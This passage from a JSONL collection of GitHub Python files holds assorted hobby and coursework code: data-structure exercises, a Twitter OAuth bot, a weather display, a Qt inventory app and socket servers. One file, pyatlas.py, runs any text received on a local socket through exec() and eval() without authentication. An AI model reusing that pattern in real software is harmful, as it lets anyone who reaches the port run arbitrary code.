31, 10, 11]\n\n for i in insertionList:\n linked_list.insert_start(i)\n\n linked_list.traverse()\n linked_list.reverse()\n print('reverse list')\n linked_list.traverse()\n","repo_name":"MarcusSanchez/DataStructures-Algorithms-Python","sub_path":"Linked Lists/3. Linked Lists Interview Questions/8. Reverse Linked List in Place.py","file_name":"8. Reverse Linked List in Place.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"21265916888","text":"import bs4\nimport re\n\n\ndef Capture_Hashtags(text):\n \n #task 1: Clean up HTML (mainly new lines)\n soup = bs4.BeautifulSoup(text, 'lxml')\n text = soup.get_text()\n text = text.replace('\\n',' ')\n text = text.replace('\\r','.')\n \n #task 4: remove links\n text = re.sub('https?://[A-Za-z0-9./~]+','', text)\n hashtags = re.findall(r'#(\\w+)',text)\n return hashtags\n","repo_name":"Bvlymen/twitter_crypto_project","sub_path":"sentiment_model_git/CaptureHashtags.py","file_name":"CaptureHashtags.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"10441418821","text":"# Python implementation\n\n# \tProgram : File Server Implementation (Server)\n# \tStatus : Stable\n# \tCreated by : Sarath Peter\n\n## Import packages here\nimport socket\n## Write functions here\n\n## Write code here\n\nport = 10101 # Reserve a port for your service.\ns = socket.socket() # Create a socket object\nhost = socket.gethostname() # Get local machine name\ns.bind((host, port)) # Bind to the port\ns.listen(5) # Now wait for client connection.\n\nprint('------- File Server is online ------')\n\nwhile True:\n conn, addr = s.accept() # Establish connection with client.\n print(addr[0]+':'+str(addr[1])+\" is online\")\n data = conn.recv(1024)\n print(repr(data))\n\n filename='test_message.txt'\n f = open(filename,'rb')\n l = f.read(1024)\n while (l):\n conn.send(l)\n print('Sent :\\n')\n print(l)\n l = f.read(1024)\n f.close()\n\n print('\\nFile Sent to '+addr[0]+':'+str(addr[1]))\n conn.send('Thank you for connecting Sarath\\'s File Server ')\n conn.close()\n","repo_name":"SamLikesCoding/Network_Lab","sub_path":"FileServer/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27478256841","text":"from collections import deque\nimport sys\n\ndef bfs(start, distance):\n\tcount = 0\n\tqueue = deque([start])\n\tvisited = [False] * (N + 1)\n\tvisited[start] = True\n\twhile queue:\n\t\tcount+=1\n\t\ttarget = queue.popleft()\n\t\tfor rel in graph[target]:\n\t\t\tif not visited[rel]:\n\t\t\t\tqueue.append(rel)\n\t\t\t\tdistance[rel] = distance[target] + 1\n\t\t\t\tvisited[rel] = True\n\ninput = sys.stdin.readline\nN, M = map(int, input().split())\n\ngraph = [[] for i in range(N + 1)]\nfor i in range(M):\n\tfriend1, friend2 = map(int, input().split())\n\tif friend1 not in graph[friend2]:\n\t\tgraph[friend1].append(friend2)\n\t\tgraph[friend2].append(friend1)\n\nmin_value = 10000\nanswer = 0\nfor i in range(1, N + 1):\n\tcount = 0\n\tdistance = [0 for i in range(N + 1)] \n\tfor j in range(1, N + 1):\n\t\tbfs(i, distance)\n\t\tif j != i:\n\t\t\tcount += distance[j]\n\tif count < min_value:\n\t\tmin_value = count\n\t\tanswer = i\nprint(answer)\n\n","repo_name":"YUIWOO/study_coding_test","sub_path":"baekjoon/kmularise/p1389.py","file_name":"p1389.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"43044789103","text":"import json\nimport boto3\nimport random\n\nkinesis = boto3.client('kinesis')\ndef getReferrer():\n data = {}\n data['LOGENTRY'] = '203.0.113.24 - - [25/Mar/2018:15:25:37 -0700] \"GET /index.php HTTP/1.1\" 200 125 \"-\" \"Mozilla/5.0 [en] Gecko/20100101 Firefox/52.0\"'\n return data\n\nwhile True:\n data = json.dumps(getReferrer())\n print(data)\n kinesis.put_record(\n StreamName=\"ExampleInputStream\",\n Data=data,\n PartitionKey=\"partitionkey\")","repo_name":"arunmastermind/AWS-examples-using-BOTO3","sub_path":"kda/kda-python-datagenerator-regexlog.py","file_name":"kda-python-datagenerator-regexlog.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"24927219395","text":"from requests_oauthlib import OAuth1Session\nimport os\nimport json\nimport io\nimport urllib.request\nfrom typing import *\nfrom scripts.config_bot import credentials, user_id, urls\n\n\n__author__ = 'kqureshi'\n\n\nclass Bot:\n\n @classmethod\n def fetch_auth(cls) -> None:\n \"\"\"\n\n \"\"\"\n consumer_key, consumer_secret = credentials['consumer_key'], credentials['consumer_secret']\n oauth = OAuth1Session(consumer_key, client_secret=consumer_secret)\n request_token_url = urls['request_token']\n fetch_response = oauth.fetch_request_token(request_token_url)\n resource_owner_key = fetch_response.get(\"oauth_token\")\n resource_owner_secret = fetch_response.get(\"oauth_token_secret\")\n base_authorization_url = urls['authorize']\n authorization_url = oauth.authorization_url(base_authorization_url)\n verifier = input(\"Please paste the pin from \\n {} \\n here: \".format(authorization_url))\n oauth = OAuth1Session(\n consumer_key,\n client_secret=consumer_secret,\n resource_owner_key=resource_owner_key,\n resource_owner_secret=resource_owner_secret,\n verifier=verifier,\n )\n access_token_url = urls['access_token']\n oauth_tokens = oauth.fetch_access_token(access_token_url)\n access_token = oauth_tokens[\"oauth_token\"]\n access_token_secret = oauth_tokens[\"oauth_token_secret\"]\n return OAuth1Session(consumer_key,\n client_secret=consumer_secret,\n resource_owner_key=access_token,\n resource_owner_secret=access_token_secret,\n )\n\n @classmethod\n def tweet(cls, text: str, reply_to: Optional[str] = None, media_url: Optional[str] = None,\n oauth: OAuth1Session = None) -> None:\n \"\"\"\n\n \"\"\"\n params = {\"text\": '{}'.format(str(text))}\n if isinstance(media_url, str):\n buffer = io.BytesIO(urllib.request.urlopen(media_url).read())\n media_response = oauth.post(urls['media'], files={\"media\": ('image.png', buffer)})\n media_string = media_response.json()['media_id_string']\n params['media'] = {'media_ids': [media_string]}\n if isinstance(reply_to, str):\n params['reply'] = {\"in_reply_to_tweet_id\": reply_to}\n response = oauth.post(urls['tweets'], json=params)\n return\n\n @classmethod\n def delete_tweet(cls, tweet_id: str, oauth: OAuth1Session = None) -> None:\n \"\"\"\n\n \"\"\"\n response = oauth.delete(\"{endpoint}/{tweet_id}\".format(tweet_id=tweet_id, endpoint=urls['tweets']))\n if response.status_code != 200:\n raise Exception(\"Failed to delete tweet\")\n return\n\n @classmethod\n def retweet(cls, tweet_id: str, oauth: Optional[OAuth1Session] = None) -> None:\n \"\"\"\n\n \"\"\"\n response = oauth.post(urls['retweets'].format(user_id=user_id),\n json={\"tweet_id\": \"{tweet_id}\".format(tweet_id=tweet_id)})\n if not response.json()['data']['retweeted']:\n print('Failed to retweet')\n return\n\n @classmethod\n def like(cls, tweet_id: str, oauth: Optional[OAuth1Session] = None) -> None:\n \"\"\"\n\n \"\"\"\n response = oauth.post(urls['like'].format(user_id=user_id),\n json={\"tweet_id\": \"{tweet_id}\".format(tweet_id=tweet_id)})\n if not response.json()['data']['liked']:\n raise Exception('Failed to like tweet')\n return\n\n @classmethod\n def follow(cls, follow_id: str, oauth: Optional[OAuth1Session] = None) -> None:\n \"\"\"\n\n \"\"\"\n response = oauth.post(urls['follow'].format(user_id),\n json={\"list_id\": \"{follow_id}\".format(follow_id=follow_id)})\n return\n\n @classmethod\n def update_description(cls, description: str, oauth: OAuth1Session = None) -> None:\n \"\"\"\n\n \"\"\"\n response = oauth.post(urls['bio'], data={'description': '{description}'.format(description=description)})\n if not response.status_code == 200:\n raise Exception('Failed to update profile description')\n return\n","repo_name":"zlisto/social_media_analytics","sub_path":"scripts/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4264,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"39"} +{"seq_id":"5548015617","text":"import requests\nfrom datetime import datetime\nimport tkinter as tk\nimport config as cg\n\n# api key, url and designated city\napi_key = cg.api_key\nbase_url = \"http://api.openweathermap.org/data/2.5/weather?\"\ncity_name = cg.city_name\nfull_url = base_url + \"q=\" + city_name + \"&appid=\" + api_key\n\nbase_zip_url = \"http://api.openweathermap.org/data/2.5/weather?\"\nzip_name = cg.zip_code\nfull_zip_irl = base_zip_url + \"zip=\" + str(zip_name) + \"&appid=\" + api_key\n\n\"\"\"\nUpdates the text for the labels in the main display.\nDoes this by collecting info from datetime and openweathermap api\n\nArgs:\n root: the root window, used to repeat process\n tempLabel: label for temperature\n clothesLabel: label for clothing recommendation\n timeLabel: label for the current time\n dateLabel: label for the current date\n \nReturns:\n n/a\n\"\"\"\n\n\ndef update(root, tempLabel, clothesLabel, timeLabel, dateLabel, weatherLabel):\n # determines weather to display 24 hour clock\n if cg.militaryTime:\n timeLabel['text'] = datetime.now().strftime(\"%H:%M\")\n # displays 12 hour clock\n else:\n # determines weather or not to display am or pm\n if (datetime.now().hour / 12) < 1:\n period = \"am\"\n else:\n period = \"pm\"\n # determines number of hour shown\n # because midnight is am and noon is pm, must be calculated separate from am/pm\n if datetime.now().hour <= 12:\n timeLabel['text'] = datetime.now().strftime(\"%H:%M\") + period\n else:\n timeLabel['text'] = str(datetime.now().hour - 12) + \":\" + str(datetime.now().minute) + period\n\n # displays date\n dateLabel['text'] = datetime.now().strftime(\"%A %B %d, %Y\\n\")\n\n # obtain json from api\n if cg.basedOnZip:\n response = requests.get(full_zip_irl)\n else:\n response = requests.get(full_url)\n x = response.json()\n\n # carries out if api called properly\n if x[\"cod\"] != \"404\":\n\n y = x[\"main\"]\n\n # obtain current temp from json in kelvin\n current_temperature = y[\"temp\"]\n # calculate Fahrenheit from kelvin\n fahrenheit = ((current_temperature - 273.15) * 1.8) + 32\n\n # set temperature label text\n if cg.fahrenheit:\n tempLabel['text'] = \"{:.1f}\".format(fahrenheit)\n else:\n tempLabel['text'] = \"{:.1f}\".format(current_temperature - 273.15)\n\n # set clothing recommendation based on obtained temperature\n if fahrenheit > 100:\n clothesLabel[\"text\"] = \"It's HOT! Wear a tank top and drink lots of water!\\n\"\n elif 100 >= fahrenheit > 75:\n clothesLabel[\"text\"] = \"Its pretty hot outside. Shorts weather!\\n\"\n elif 75 >= fahrenheit > 50:\n clothesLabel[\"text\"] = \"Its a comfortable temperature out. Pants and a T-shirt will do.\\n\"\n elif 50 >= fahrenheit > 32:\n clothesLabel[\"text\"] = \"It's a bit cold out. Wear long sleeves!\\n\"\n else:\n clothesLabel[\"text\"] = \"Its freezing out there! Wear as much layers as possible!\\n\"\n\n y = x[\"weather\"][0]\n\n desc = y[\"description\"]\n\n weatherLabel[\"text\"] = desc\n\n # returns error when city is not found\n else:\n tempLabel['text'] = \"City not found\"\n clothesLabel['text'] = \"Check your config file\"\n\n # rerun this function every second\n root.after(1000, update, root, tempLabel, clothesLabel, timeLabel, dateLabel, weatherLabel)\n\n\n\"\"\"\nMain function for the program.\nContains initialization of window and labels.\n\"\"\"\n\n\ndef main():\n # create window and frame for labels\n root = tk.Tk()\n root.attributes('-fullscreen', cg.fullscreen)\n root.geometry(\"750x750\")\n frame = tk.Frame(root)\n\n # create labels\n timeLabel = tk.Label(frame,\n anchor=tk.CENTER,\n justify=tk.CENTER,\n font=(\"Courier\", 60))\n dateLabel = tk.Label(frame,\n anchor=tk.CENTER,\n justify=tk.CENTER,\n font=(\"Courier\", 12))\n tempLabel = tk.Label(frame,\n anchor=tk.CENTER,\n justify=tk.CENTER,\n font=(\"Courier\", 60))\n clothesLabel = tk.Label(frame,\n anchor=tk.CENTER,\n justify=tk.CENTER,\n font=(\"Courier\", 12))\n weatherLabel = tk.Label(frame,\n anchor=tk.CENTER,\n justify=tk.CENTER,\n font=(\"Courier\", 12))\n\n # pack labels/frame\n timeLabel.pack(fill=\"x\")\n dateLabel.pack(fill=\"x\")\n tempLabel.pack(fill=\"x\")\n clothesLabel.pack(fill=\"x\")\n weatherLabel.pack(fill=\"x\")\n frame.pack(expand=1)\n\n # run fist instance of update\n update(root, tempLabel, clothesLabel, timeLabel, dateLabel, weatherLabel)\n\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kable5/dailyDisplay","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"20101835529","text":"import socket\nimport threading\nimport sys\nimport time\nimport atexit\nimport re\n\n\nephestos_running = False\nthread_created = False\nthreadSocket = 0\nsocketServer = 0\nreceivedSocket = \"none\"\nlistening = False\nsocketMessages = []\nshutDown = False\nreceivedData = ''\npherror = [\"\"]\nalogging = True\n\ndef initialize_server():\n if alogging:\n print(\"initializing server\")\n\n global threadSocket,listening\n #threadSocket = threading.Thread(name='threadSocket', target= socket_listen)\n listening = True\n\n if alogging:\n print(\"calling create_socket_connection\")\n\n create_socket_connection()\n socket_listen()\n #threadSocket.start()\n\n\ndef socket_listen():\n global receivedSocket,listening, receivedData,socketServer, socketMessages, pherror\n socketServer.listen(5)\n\n\n while listening:\n (receivedSocket , adreess) = socketServer.accept()\n receivedData = (receivedSocket.recv(1024)).decode(\"utf-8\")[:-2]\n\n\n socketMessages.append(receivedData)\n time.sleep(0.03)\n handle_messages()\n\n if alogging:\n print(\"pherror : \" ,pherror)\n\n\n while not (pherror[-1]==\"\"):\n\n receivedSocket.sendall((pherror[-1]+'\\n').encode())\n if alogging:\n print(\"I have sent err : --->\"+ pherror[-1] + ' <---- and removed it from the list of errors')\n\n if len(pherror) > 1:pherror.remove(pherror[-1])\n\n\n receivedSocket.sendall(\"end of error\\n\".encode())\n # receivedSocket.close()\n\ndef create_socket_connection():\n global socketServer, shutDown\n socketServer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n socketServer.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n socketServer.bind(('127.0.0.1',4000))\n\n\n\n\ndef handle_messages():\n global ephestos_running, thread_created, listening, socketServer, socketMessages, pherror, shutDown\n\n for msg in socketMessages:\n try:\n if \"RetValue:\" in msg:\n regexobj = re.compile(\"[^(RetValue:)]\\S.*\")\n regexsearch = regexobj.search(msg)\n pythoncomm = regexsearch.group(0)\n pherror.append(\"RetValue:\"+str(eval(pythoncomm)))\n #pherror.append(\"no error\\n\")\n\n if alogging:\n print(\"eval with pherror: \",pherror)\n\n elif \"exit\" in msg:\n pherror.append(\"no error\\n\")\n shutDown=True\n else:\n exec(msg,globals())\n pherror.append(\"no error\\n\")\n except Exception as e:\n newerror = \"Error:\" +str(e)+\" with :\" + msg\n pherror.append( newerror )\n if alogging:\n print( \"inserted an error now pherror : \",pherror)\n\n #socketMessages.remove(msg)\n socketMessages.remove(msg)\n\n if shutDown:\n ephestos_running = False\n listening = False\n\n socketServer.settimeout(0.01)\n socketServer.close()\n time.sleep(1)\n\n #threadSocket.join()\n del socketServer\n\n thread_created = False\n shutDown = False\n\n\n\ndef initAtlas():\n\n #anotherThread = threading.Thread(target=another_thread)\n #anotherThread.start()\n\n initialize_server()\n\n\n\n\nif __name__ == \"__main__\":\n initAtlas()\n","repo_name":"kilon/Atlas","sub_path":"pyatlas.py","file_name":"pyatlas.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"39"} +{"seq_id":"9034739812","text":"import threading\nimport logging\nimport time\n\nfrom PySide2.QtWidgets import QMainWindow, QApplication, QMdiSubWindow, QMessageBox\nfrom PySide2.QtGui import QCloseEvent\nfrom PySide2.QtCore import Qt, QCoreApplication, QSettings\n\nfrom src.ui_mainwindow import Ui_MainWindow\nfrom src.settings import Settings\nfrom src.goodsin import GoodsIn\nfrom src.goodsout import GoodsOut\nfrom src.raw import Raw\nfrom src.edit import Edit\nfrom src.dataout import DataOut\nfrom src.admin import Admin\nimport src.db as DB\n\n\nABOUT = '# TODO'\nAPPLICATION = 'GoReg'\nDOMAIN = 'https://www.tmstudios.de/'\nORGANIZATION = 'tm studios'\nVERSION = '0.0.2'\nPING_DELAY = 60\n\n\nclass MainWindow(Ui_MainWindow):\n Modules = {\n 'gin': GoodsIn,\n 'gout': GoodsOut,\n 'raw': Raw,\n 'edit': Edit,\n 'dout': DataOut,\n 'admin': Admin\n }\n\n def __init__(self):\n self.app = QApplication([])\n QCoreApplication.setApplicationName(APPLICATION)\n QCoreApplication.setApplicationVersion(VERSION)\n QCoreApplication.setOrganizationDomain(DOMAIN)\n QCoreApplication.setOrganizationName(ORGANIZATION)\n self.widget = QMainWindow()\n self.setupUi(self.widget)\n self.setting = QSettings('GoReg.conf', QSettings.IniFormat)\n\n self.modules = {}\n\n self.action_settings.triggered.connect(self.show_settings)\n self.action_login.triggered.connect(self.login)\n self.action_logout.triggered.connect(self.logout)\n self.action_goods_in.triggered.connect(\n lambda: self.add_module('gin'))\n self.action_goods_out.triggered.connect(\n lambda: self.add_module('gout'))\n self.action_raw.triggered.connect(lambda: self.add_module('raw'))\n self.action_edit.triggered.connect(lambda: self.add_module('edit'))\n self.action_do.triggered.connect(lambda: self.add_module('dout'))\n self.action_admin.triggered.connect(lambda: self.add_module('admin'))\n self.action_aboutqt.triggered.connect(\n lambda: QMessageBox.aboutQt(self.widget))\n self.action_about.triggered.connect(\n lambda: QMessageBox.about(\n self.widget, APPLICATION, '\\n'.join([VERSION, ORGANIZATION, ABOUT])))\n self.widget.closeEvent = self.on_quit\n\n self.do_ping = False\n self.ping_thread = None\n\n self.widget.show()\n self.app.exec_()\n\n def add_module(self, name: str) -> None:\n if name not in self.modules:\n self.modules[name] = self.Modules[name]()\n widget = self.modules[name].widget\n window = QMdiSubWindow(self.mdiArea)\n window.setWidget(widget)\n window.closeEvent = lambda evt: self.close_widget(name, evt)\n window.resize(640, 480)\n\n self.mdiArea.addSubWindow(window)\n widget.show()\n\n def close_widget(self, name: str, event: QCloseEvent) -> None:\n module = self.modules[name]\n if module.close() == True:\n self.modules.pop(name)\n event.accept()\n else:\n event.ignore()\n\n def login(self) -> bool:\n config = {\n 'host': self.setting.value('database/address'),\n 'port': self.setting.value('database/port'),\n 'database': 'GoReg',\n 'user': self.setting.value('database/user'),\n 'password': self.setting.value('database/password')\n }\n\n if config['host'] == None:\n QMessageBox.critical(self.widget,\n 'Fehler',\n 'Software wurde noch nicht konfiguriert')\n return False\n\n try:\n DB.connect(config)\n except DB.MySQL.Error as err:\n QMessageBox.critical(self.widget,\n 'Fehler',\n 'Keine Verbindung zur Datenbank')\n return False\n\n self.ping_thread = threading.Thread(target=self.ping)\n self.do_ping = True\n self.ping_thread.start()\n\n self.action_login.setDisabled(True)\n self.action_logout.setDisabled(False)\n self.action_settings.setDisabled(True)\n self.action_admin.setDisabled(False)\n self.action_do.setDisabled(False)\n self.action_edit.setDisabled(False)\n self.action_goods_in.setDisabled(False)\n self.action_goods_out.setDisabled(False)\n self.action_raw.setDisabled(False)\n\n self.statusbar.showMessage('Verbunden mit Datenbank', 10000)\n return True\n\n def logout(self) -> bool:\n do_close = True\n arr = [x for x in self.modules.values()]\n for module in arr:\n do_close &= module.widget.parentWidget().close()\n if not do_close:\n return False\n\n try:\n DB.disconnect()\n except DB.MySQL.Error as err:\n QMessageBox(self.widget, 'Fehler',\n 'Keine Verbindung zur Datenbank')\n return False\n\n self.do_ping = False\n if self.ping_thread is not None:\n if self.ping_thread.is_alive():\n self.ping_thread.join()\n\n self.action_login.setDisabled(False)\n self.action_logout.setDisabled(True)\n self.action_settings.setDisabled(False)\n self.action_admin.setDisabled(True)\n self.action_do.setDisabled(True)\n self.action_edit.setDisabled(True)\n self.action_goods_in.setDisabled(True)\n self.action_goods_out.setDisabled(True)\n self.action_raw.setDisabled(True)\n\n self.statusbar.showMessage('Verbindung zur Datenbank beendet', 10000)\n return True\n\n def on_quit(self, event: QCloseEvent) -> None:\n if self.logout():\n event.accept()\n else:\n event.ignore()\n\n def ping(self) -> None:\n delay = 0\n while self.do_ping:\n if delay < PING_DELAY:\n delay += 1\n time.sleep(1)\n else:\n delay = 0\n DB.ping()\n\n def show_settings(self):\n dialog = Settings(self.widget)\n # TODO\n\n","repo_name":"MarcelAllmrodt/GoReg","sub_path":"src/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":6107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"42077128946","text":"import pynever.networks as pyn_net\nimport pynever.strategies.conversion as pyn_conv\nimport pynever.strategies.verification as pyn_ver\nimport pynever.nodes as pyn_nodes\nimport pynever.strategies.smt_reading as pyn_smt\nimport onnx\nimport logging\nimport os\nimport copy\nfrom datetime import datetime\n\n\n#\n#\n#\n#\n# ##### DIRECTORIES CREATION #####\nlogs_dir = \"logs/\"\nif not os.path.exists(logs_dir):\n os.mkdir(logs_dir)\n\nclean_dir = \"clean_onnx/\"\nif not os.path.exists(clean_dir):\n os.mkdir(clean_dir)\n\n#\n#\n#\n#\n# ##### PARAMETERS DEFINITION #####\nonnx_path = \"onnx_nets/\"\nonnx_ids = [\"cartpole.onnx\", \"dubinsrejoin.onnx\", \"lunarlander.onnx\"]\n\n#\n#\n#\n#\n# ##### MODELS CLEANING #####\n\nfor onnx_id in onnx_ids:\n net_id = onnx_id.replace(\".onnx\", \"\")\n onnx_model = pyn_conv.ONNXNetwork(net_id, onnx.load(onnx_path + onnx_id))\n temp_net = pyn_conv.ONNXConverter().to_neural_network(onnx_model)\n\n # Network cleaning: we assume only the FC nodes and the ReLU nodes are relevant\n assert isinstance(temp_net, pyn_net.SequentialNetwork)\n current_node = temp_net.get_first_node()\n clean_net = pyn_net.SequentialNetwork(net_id, \"X\")\n node_counter = 0\n while current_node is not None:\n\n if isinstance(current_node, pyn_nodes.FullyConnectedNode):\n clean_node = copy.deepcopy(current_node)\n clean_node.identifier = f\"FC_{node_counter}\"\n clean_net.add_node(clean_node)\n node_counter += 1\n elif isinstance(current_node, pyn_nodes.ReLUNode):\n clean_node = copy.deepcopy(current_node)\n clean_node.identifier = f\"ReLU_{node_counter}\"\n clean_net.add_node(clean_node)\n node_counter += 1\n\n else:\n pass\n\n current_node = temp_net.get_next_node(current_node)\n\n onnx.save(pyn_conv.ONNXConverter().from_neural_network(clean_net).onnx_network, clean_dir + clean_net.identifier +\n \".onnx\")\n\n\n","repo_name":"NeVerTools/pyNeVer","sub_path":"examples/submissions/IEEEAccess2023/vnncomp_benchmarks/model_cleaning.py","file_name":"model_cleaning.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"39"} +{"seq_id":"38175391385","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 16 17:41:31 2018\n\n@author: Samantha\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy import stats\n\n\nx = np.arange(0.001,10,0.01)\ny = np.log(x)\n\ninicio = 1.02\nancho_intervalo=0.5\nint1, int2 = inicio, inicio+ancho_intervalo\nancho = 0.01\nc1, c2 = np.mean([int1, int2])-ancho, np.mean([int1, int2])+ancho\n\n\nx2 = np.arange(int1,int2,0.001)\ny2 = np.log(x2)\n\nx3 = np.arange(c1, c2, 0.001)\ny3 = np.log(x3)\n\n#x2 = x3\n#y2 = y3\n\nm, b = np.polyfit(x3,y3,1)\n\ndef recta(t):\n return m*t+b\n \nr = recta(x) \nr2 = recta(x2)\n\n\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(x,y, 'b-', label= '$\\log(x)$')\nax.plot(x,r, 'r-', label = 'Aprox. lineal')\nax.plot(x2, y2, 'k')\nax.plot(x2, r2, 'k')\n#plt.plot(x, r, 'r')\n#intervalos logaritmo\nax.vlines(x=int1, ymin=np.log(0.01),ymax=np.log(int1),colors='k', linestyles='dashed')\nax.vlines(x=int2, ymin=np.log(0.01),ymax=np.log(int2),colors='k', linestyles='dashed')\nax.hlines(y=np.log(int1), xmin=0,xmax=int1,colors='b', linestyles='dashed')\nax.hlines(y=np.log(int2), xmin=0,xmax=int2,colors='b', linestyles='dashed')\nax.vlines(x=0.011, ymin=np.log(int1), ymax=np.log(int2), colors='g', linestyles='solid')\n#intervalos lineal\nax.vlines(x=int1, ymin=np.log(0.01),ymax=recta(int1),colors='k', linestyles='dashed')\nax.vlines(x=int2, ymin=np.log(0.01),ymax=recta(int2),colors='k', linestyles='dashed')\nax.hlines(y=recta(int1), xmin=0,xmax=int1,colors='r', linestyles='dashed')\nax.hlines(y=recta(int2), xmin=0,xmax=int2,colors='r', linestyles='dashed')\nax.vlines(x=0.011, ymin=recta(int1), ymax=recta(int2), colors='g', linestyles='solid')\nax.legend(loc=1, borderaxespad=0.3)\nax.set_xlabel('x')\nax.set_ylabel('y')\n#ax.set_xlim(xmin=0.01, xmax=0.5)\n#ax.set_ylim(ymin=np.log(0.01), ymax=0)\nax.grid()\n\n#plt.savefig('F:/Facultad/Estadística/loglineal.png', dpi=None, facecolor='w', edgecolor='w', orientation='portrait', papertype=None, format=None, transparent=False, bbox_inches='tight', pad_inches=0.1, frameon=None)\n\n#%%\ndef lineal(t,pendiente, ordenada):\n return pendiente*t+ordenada\n\nies = np.arange(0.01,1.5,0.01)\nfor i in ies:\n ancho_intervalo = 0.5\n int1_f, int2_f = i, i+ancho_intervalo\n ancho_f = 0.01\n c1_f, c2_f = np.mean([int1_f, int2_f])-ancho_f, np.mean([int1_f, int2_f])+ancho_f \n x3_f = np.arange(c1_f, c2_f, 0.001)\n y3_f = np.log(x3_f)\n \n m_f, b_f = np.polyfit(x3_f,y3_f,1)\n intervalo_log = np.log(int2_f)- np.log(int1_f)\n intervalo_recta = lineal(int2_f, m_f, b_f)- lineal(int1_f, m_f, b_f)\n if intervalo_recta>intervalo_log:\n print(round(i,2), 'intervalo_recta>intervalo_log')\n elif intervalo_rectaintervalo_recta')\n \n \n \n \n \n ","repo_name":"samanthakucher/Dataciones_con_C14","sub_path":"grafico_log_aprox_lineal.py","file_name":"grafico_log_aprox_lineal.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"70046674355","text":"\r\nimport collections\r\n\r\n\r\ndef canPartitionKSubsets(self, nums, k):\r\n if not nums or not k or 0 != sum(nums)%k:\r\n return False\r\n\r\n def dfs(nums, n, k, start, used, part, inc):\r\n if k == 1:\r\n return True\r\n if inc > part:\r\n return False\r\n if inc == part:\r\n inc = 0\r\n k -= 1\r\n start = 0\r\n\r\n for i in range(start, n):\r\n if used[i] == True:\r\n continue\r\n used[i] = True\r\n if dfs(nums, n, k, i+1, used, part, inc + nums[i]):\r\n return True\r\n used[i] = False\r\n return False\r\n\r\n used = [False]*len(nums)\r\n return dfs(nums, len(nums), k, 0, used, sum(nums)//k, 0)\r\n\r\n\r\ntc = int(input())\r\nfor t in range(tc):\r\n n = int(input())\r\n nums = list(map(int, input().split()))\r\n if 0 == sum(nums)%2 and True == canPartitionKSubsets(nums, 2):\r\n print('YES')\r\n else:\r\n print('NO')\r\n\r\n\r\n\r\nprint(is_subset_sum([4, 1, 10, 12, 5, 2], 6, 9))\r\nprint(isSubsetSum([4, 1, 10, 12, 5, 2], 6, 9))\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"roiei/algo","sub_path":"Geeksforgeeks/12. Subset Sum Problem in O(sum) space.py","file_name":"12. Subset Sum Problem in O(sum) space.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"29573282553","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('inventoryKMA', '0005_auto_20150512_1416'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='unititem',\n name='field',\n field=models.CharField(default=2, validators=[django.core.validators.MinLengthValidator(0)], max_length=15),\n preserve_default=False,\n ),\n ]\n","repo_name":"valysenko/python","sub_path":"envs/inventory/dev/inventory/inventoryKMA/migrations/0006_unititem_field.py","file_name":"0006_unititem_field.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"6965492222","text":"#!/usr/bin/python3\n\"\"\" append_after module \"\"\"\n\n\ndef append_after(filename=\"\", search_string=\"\", new_string=\"\"):\n \"\"\"\n Function to add string after a specific string\n Args:\n search_string: string to identify\n new_string: string to add\n \"\"\"\n new = \"\"\n\n with open(filename, 'r') as file:\n for line in file:\n new += line\n if search_string in line:\n new += new_string\n\n with open(filename, 'w') as file:\n file.write(new)\n","repo_name":"kenkomu/higher_level_programming","sub_path":"0x0B-python-input_output/100-append_after.py","file_name":"100-append_after.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"11540394114","text":"from numpy import *\nimport matplotlib.pyplot as plt\n\ndef loadDataSet(filename):\n numFeat = len(open(filename).readline().split('\\t')) - 1\n dataMat = []\n labbelMat = []\n fr = open(filename)\n for line in fr.readlines():\n lineArr = []\n currLine = line.strip().split('\\t')\n for i in range(numFeat):\n lineArr.append(float(currLine[i]))\n dataMat.append(lineArr)\n labbelMat.append(float(currLine[-1]))\n return dataMat, labbelMat\n\ndef standRegres(xArr, yArr):\n xMat = mat(xArr)\n yMat = 